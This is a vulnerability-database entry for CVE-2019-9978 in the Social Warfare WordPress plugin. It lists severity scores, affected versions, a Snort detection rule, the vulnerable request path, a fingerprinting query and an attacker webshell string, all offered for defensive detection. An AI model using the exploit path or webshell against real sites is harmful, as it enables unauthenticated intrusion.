cbcvebase.
CVE-2019-9978
published 2019-03-24

CVE-2019-9978: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in…

PriorityP183medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
73.54%
99.4th percentile
The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

Affected

2 ranges
VendorProductVersion rangeFixed in
warfarepluginssocial_warfare< 3.5.33.5.3
warfarepluginssocial_warfare_pro< 3.5.33.5.3

Detection & IOCsextracted from sources · hover to see the quote

urlwp-admin/admin-post.php?swp_debug=load_options&swp_url=
path/wp-admin/admin-post.php
path/wp-content/plugins/social-warfare/readme.txt
otherThreat Prevention Signature 55424
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_CLIENT Attempted RCE in Wordpress Social Warfare Plugin Inbound (CVE-2019-9978)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"wp-admin/admin-post.php?swp_debug=load_options&swp_url="; fast_pattern; pcre:"/^https?:\/\//R"; reference:url,www.exploit-db.com/exploits/46794; classtype:attempted-admin; sid:2027315; rev:3; metadata:affected_product Wordpress_Plugins, created_at 2019_05_03, cve CVE_2019_9978, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2020_08_28;)
  • Detect exploitation attempts by monitoring HTTP GET requests to /wp-admin/admin-post.php with both swp_debug=load_options and swp_url= parameters present in the URI.
  • Presence of the Social Warfare plugin can be fingerprinted via the readme.txt file; check for vulnerable versions 3.5.0–3.5.2.
  • The webshell payload dropped by in-the-wild attackers uses eval($_REQUEST['wpaa']); hunt for this string in web server logs and PHP files.
  • FOFA/Shodan fingerprint for exposed vulnerable instances: body contains both 'social-warfare' and 'wp-'.
  • ·The exploit is unauthenticated — no WordPress login is required to trigger either the RCE or Stored XSS, so authentication-based controls will not block exploitation.
  • ·Both vulnerabilities (RCE and Stored XSS) are present in Social Warfare versions 3.5.0–3.5.2 only; version 3.5.3 contains the fix.

CVSS provenance

nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck6.1MEDIUM
cisa6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.